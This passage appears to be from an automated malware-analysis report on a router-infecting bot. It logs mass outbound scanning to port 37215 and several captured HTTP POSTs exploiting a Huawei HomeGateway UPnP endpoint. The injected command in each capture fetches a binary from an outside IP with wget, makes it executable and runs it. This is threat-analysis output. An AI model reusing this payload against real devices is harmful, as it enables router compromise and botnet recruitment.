Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.53.235.80:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.206.152.181:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 159.132.25.226:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 221.242.47.90:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.46.140.82:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 50.57.3.148:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.15.166.210:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 178.233.153.101:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.145.241.243:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.25.226.209:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.154.203.17:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.109.208.34:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.147.33.127:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.55.253.220:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.77.87.29:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.107.110.24:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 78.243.201.88:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.239.25.75:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.233.129.82:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.42.6.124:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 31.221.95.199:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 38.77.85.46:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.165.95.73:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 95.60.30.58:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.145.123.137:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.143.69.7:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 20.159.88.39:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.148.174.22:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.23.138.122:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.88.128.252:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.210.120.76:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.144.17.246:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.4.18.189:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 120.104.29.104:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 112.164.221.197:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 52.6.222.231:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.233.254.33:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.157.158.0:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 186.189.173.128:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.176.115.109:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.202.81.189:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 198.59.254.71:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.156.229.184:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.153.145.100:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 31.21.152.75:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.122.195.8:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.148.144.124:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 160.156.201.209:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 121.77.21.127:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.240.87.6:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.162.119.177:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.125.201.174:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 174.45.138.192:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.42.154.150:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.109.56.175:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.43.114.102:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.71.235.116:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.95.8.48:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.139.156.115:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.72.145.140:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.222.167.90:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.83.144.32:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.165.20.83:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.114.63.81:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.142.31.115:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 14.237.129.0:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 62.106.146.118:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.41.16.181:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 69.102.11.216:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.126.77.69:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.54.53.4:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 144.130.21.219:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.123.102.36:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.202.67.206:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.28.250.88:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.181.178.251:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.59.96.34:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.90.25.232:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 134.127.30.72:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.149.160.40:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.77.51.145:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.122.147.11:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 72.20.243.52:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.105.24.81:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.57.183.53:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.156.28.109:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.242.77.118:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.67.208.136:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.96.211.83:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.48.38.69:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.220.38.243:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 168.181.167.111:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.129.31.169:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.241.239.57:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.218.117.209:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.250.153.104:37215

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 